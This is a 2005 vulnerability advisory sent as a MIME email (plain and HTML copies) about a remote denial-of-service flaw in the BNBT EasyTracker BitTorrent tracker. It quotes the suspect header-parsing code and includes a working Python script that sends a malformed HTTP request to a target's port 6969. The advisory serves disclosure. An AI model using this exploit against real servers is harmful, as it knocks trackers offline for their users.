------=_Part_1314_25115579.1125371502728 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline BNBT EasyTracker Remote Denial of Service Vulnerability by Sowhat Last Update:2005.08.30 http://secway.org/advisory/AD20050830.txt Vendor: http://bnbteasytracker.sourceforge.net/ Product Affected: 7.7r3.2004.10.27 and below Overview: BNBT was written by Trevor Hogan. BNBT is a complete port=20 of the original Python BitTorrent tracker to C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python BitTorrent tracker, plus it's=20 easy to use and customizable. BNBT is covered under the GNU Lesser General Public License (LGPL). A Denial of Service vulnerability exists within BNBT which allows for an attacker to cause the BNBT to stop responding.=20 Details: A specifically crafted HTTP request will cause the BNBT=20 Server stop responding. Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" will reproduce the problem. It seems that the bug is located in client.cpp, "//grab headers" section. And it is something like " 1-2 =3D -1" and similar to memcpy(-1) ?=20 // grab headers string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n" ); string :: size_type iDoubleNewLine =3D m_strReceiveBuf.find( "\r\n\r\n" ); strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),=20 iDoubleNewLine - iNewLine - strlen( "\r\n" ) ); while( 1 ) { string :: size_type iSplit =3D strTemp.find( ":" ); string :: size_type iEnd =3D strTemp.find( "\r\n" ); if( iSplit =3D=3D string :: npos ) { UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" ); break; } string strKey =3D strTemp.substr( 0, iSplit ); string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit = -=20 strlen( "\r\n" ) );//Bug here ?? rqst.mapHeaders.insert( pair( strKey, strValue ) ); strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" ) ); if( iEnd =3D=3D string :: npos ) break; } However, I am not quite sure about that and it seems that it is only a D.O.S so I havnt deep into it.=20 =20 Exploit: //BNBTDOS.py # BNBT EasyTracker Remote D.O.S Exploit # Bug discoverd and coded by Sowhat # http://secway.org # Version 7.7r3.2004.10.27 and below # the BNBT project: http://bnbteasytracker.sourceforge.net/ import sys import string import socket if (len(sys.argv) !=3D 2): print "\nUsage: " + sys.argv[0] + " TargetIP\n" print "##################################################################" print "# #" print "# BNBT EasyTracker Remote D.O.S Exploit #" print "# Bug discoverd and coded by Sowhat #" print "# http://secway.org #" print "##################################################################" sys.exit(0) host =3D sys.argv[1] port =3D 6969 payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,port)) s.send(payload) WORKAROUND: No WORKAROUND this time. plz check the vendor's website for update Maybe there will be a patch later (?) Vendor Response: 2005.08.22 Vendor notified via Webform,no email found=20 2005.08.30 Vendor no response. Advisory Released "Life is like a bug, Do you know how to exploit it ?" ------=_Part_1314_25115579.1125371502728 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline

BNBT EasyTracker Remote Denial of Service Vulnerability

by Sowhat

Last Update:2005.08.30

http://secway.org/= advisory/AD20050830.txt

Vendor:

http://bnbteasytrack= er.sourceforge.net/

Product Affected:

7.7r3.2004.10.27 and below

Overview:

BNBT was written by Trevor Hogan. BNBT is a complete port
of the ori= ginal Python BitTorrent tracker to C++ for speed
and efficiency. BNBT al= so offers many additional features
beyond the original Python BitTorrent= tracker, plus it's=20
easy to use and customizable. BNBT is covered under the GNU
 Le= sser General Public License (LGPL).

A Denial of Service vulnerability exists within BNBT which
allows for= an attacker to cause the BNBT to stop responding.

Details:

A specifically crafted HTTP request will cause the BNBT
Server stop = responding.

Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"<= br>will reproduce the problem. It seems that the bug is located
in clien= t.cpp, "//grab headers" section. And it is something
like &quo= t; 1-2 =3D -1" and similar to memcpy(-1) ?=20

// grab headers

 string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n&= quot; );
 string :: size_type iDoubleNewLine =3D m_strReceiveBuf.fi= nd( "\r\n\r\n" );

 strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n&= quot; ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

 while( 1 )
 {
  string :: size_type iSplit = =3D strTemp.find( ":" );
  string :: size_type iEnd = =3D strTemp.find( "\r\n" );

  if( iSplit =3D=3D string :: npos )
  {
 = ;  UTIL_LogPrint( "client warning - malformed HTTP request (= bad header)\n" );

   break;
  }

  string strKey =3D strTemp.substr( 0, iSplit );
 &nbs= p;string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iE= nd - iSplit - strlen( "\r\n" ) );//Bug here ??

  rqst.mapHeaders.insert( pair<string, string>( strKey, = strValue ) );

  strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" = ) );

  if( iEnd =3D=3D string :: npos )
   break;=
 }

However, I am not quite sure about that and it seems that
it is only = a D.O.S so I havnt deep into it.
 

Exploit:

//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discove= rd and coded by Sowhat
# http://secway.or= g

# Version 7.7r3.2004.10.27 and below
# the BNBT project:  http://bnbteasytracker.source= forge.net/
 
import sys
import string
import socket

if (len(sys.argv) !=3D 2):
 print "\nUsage: " + sys.ar= gv[0] + " TargetIP\n"
 print "######################= ############################################"
 print "#&n= bsp;            = ;            &n= bsp;            = ;            &n= bsp;            = ; #"
 print "#        &nbs= p; BNBT EasyTracker Remote D.O.S Exploit      = ;           #"
&n= bsp;print "#         &nbs= p; Bug discoverd and coded by Sowhat      &nb= sp;            = #"
 print "#       &n= bsp;      http://secway.org         =             &nb= sp;           #"
=  print "#########################################################= #########"
 sys.exit(0)

host =3D sys.argv[1]
port =3D 6969


payload  =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((hos= t,port))
s.send(payload)


WORKAROUND:

No WORKAROUND this time.
plz check the vendor's website for updateMaybe there will be a patch later (?)

Vendor Response:

2005.08.22 Vendor notified via Webform,no email found
2005.08.30 Ven= dor no response. Advisory Released

"Life is like a bug, Do you know how to exploit it ?"


 

------=_Part_1314_25115579.1125371502728--